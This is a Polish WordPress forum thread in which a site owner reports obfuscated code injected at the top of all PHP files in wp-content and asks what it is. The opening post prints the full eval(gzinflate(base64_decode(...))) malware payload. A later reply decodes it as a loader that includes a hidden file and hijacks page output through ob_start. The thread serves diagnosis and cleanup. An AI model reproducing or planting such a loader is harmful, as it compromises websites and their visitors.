Dziwny kod dodany do wszystkich plików php w katalogu wp-content

Hetman
(@tomeh)

13 lat, 11 miesięcy temu

Witam, mam taki problem, pytanie – po aktualizacji forum widzę że do wszystkich plików php z katalogu wp-content został dodany kod na górze każdego pliku – jakieś dziwny z cyferek i liter.

Proszę o pomoc w odpowiedzi co to jest.

Przykładowy taki kod to:

<?php /*4c8baa0f80eb64b7b15195da7b03ec98*/ eval(gzinflate(base64_decode('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')));?>

Zobacz 9 odpowiedzi - od 1 do 9 (z 9 łącznie)

Moderator amistad18
(@amistad18)

13 lat, 11 miesięcy temu

Po jakiej aktualizacji forum?

Twórca wątku Hetman
(@tomeh)

13 lat, 11 miesięcy temu

Po aktualizacji Wordpresa znaczy na najnowszego.

Moderator amistad18
(@amistad18)

13 lat, 11 miesięcy temu

To jest jakiś zakodowany kod, całkiem długi, do tego użycie dodatkowo funkcji gzinflate, a przedtem na kodzie gzdeflate, utrudnia jego odkodowanie.

eloleon
(@eloleon)

13 lat, 11 miesięcy temu

To wyglada jak kod wirusa. Z 2 tygodnie temu podobny kod mialem w jednym pliku na serwerze. Tzn bylo tak. Klient uploadowal obrazek ktory mial byc gdzies tam na glownej stronie i wrzucil wirusa razem z obrazkiem. i bylo tak ze wirus byl w pliku o nazwie cos jak cp-panel-admin.php . Duzo osob mogloby pomyslec ze to wazny plik od CMSa no ale ktos tak nazwal plik zeby zmylic.

Co do wirusa to schemat byl podobny ale bylo tak ze kod wirusa byl przypisany do zmiennej i ta zmienna wywolala eval’em. U Ciebie eval jest na poczatku.

Twórca wątku Hetman
(@tomeh)

13 lat, 11 miesięcy temu

Muszę dodać że na jednej z stron na której nie usunąłem tego kodu treść artykułów poznikała – widać je w kodzie (źródle strony) ale nie są wyświetlane w przeglądarce gdy wchodzi się na stronę danego artykułu.

Jaką drogą mogło się to dostać, skoro to pojawiło się dopiero przy aktualizacji wordpressa – a aktualizację wykonałem automatycznie?

Na jednej z stron mam Contact from wtyczkę i możliwość komentowania wpisów, ale na innej co miała też ten problem nie mam nic z tych rzeczy.

Czy ktoś ma na to jakiś pomysł?

Twórca wątku Hetman
(@tomeh)

13 lat, 11 miesięcy temu

Proszę tylko o pomoc w odpowiedzi czym jest ten kod – i jakie ma działanie – jak ktoś wie.

Moderator amistad18
(@amistad18)

13 lat, 11 miesięcy temu

Przeczytałeś w ogóle mojego posta?

Twórca wątku Hetman
(@tomeh)

13 lat, 11 miesięcy temu

Tak ale może ktoś się na tym zna i wie co to jest bez potrzeby kodowania a może nawet i umie odkodować.

wmstudiopl
(@wmstudiopl)

13 lat, 10 miesięcy temu

Witam.
Ja odkodowałem
/*dumjdjhpgvnlnygabsmvyywqxbsuycpkeoihnbmdzbykrzeqyw*/ if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='.../public_html/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/...';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
W miejscach '…’ znajdują się konkretne adresy, które ze względów bezpieczeństwa usunąłem.
tomeh – jeżeli chcesz zobaczyć całoś napisz na maila zdzislaw@wm-studio.pl i podaj z jakiego adresu ten kod pochodzi.

Co taki skrypt robi:
w wolnym tłumaczeniu, bo już późno – najpierw deklaruje sobie zmienną globalną 'mfsn’ i zapisuje do niej adres pliku na serwerze (bezwzględna ścieżka systemu plików). Co ciekawe deklaracja jest zabezpieczona, aby się uruchomiła tylko raz. Następnie dołącza ten plik do kodu programu i zapewne w nim znajdują się funkcje 'gml’ i 'dgobh’. Na koniec uruchamia przechwytywanie wyjścia 'ob_start’ i ustawia na wyjściu z przechwytywania uruchamianie funkcji 'dgobh’.
Funkcja ta może sobie robić co chce z kodem html (np. pozmieniać twoje adresy na swoje, lub wkleić kolejną funkcję, np. z serwera zewnętrznego itp).
To tak z grubsza tyle.
Dobrze byłoby zabezpieczyć katalog '/public_html/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/’ przed zapisem.
Tymczasem pozdrawiam.

Zobacz 9 odpowiedzi - od 1 do 9 (z 9 łącznie)

Temat ‘Dziwny kod dodany do wszystkich plików php w katalogu wp-content’ jest zamknięty na nowe odpowiedzi.

Dziwny kod dodany do wszystkich plików php w katalogu wp-content

Tematy

Najbardziej popularne tematy

Tematy bez odpowiedzi

Wątki niezwiązane ze wsparciem

Rozwiązane wątki

Nierozwiązane tematy

Wszystkie tematy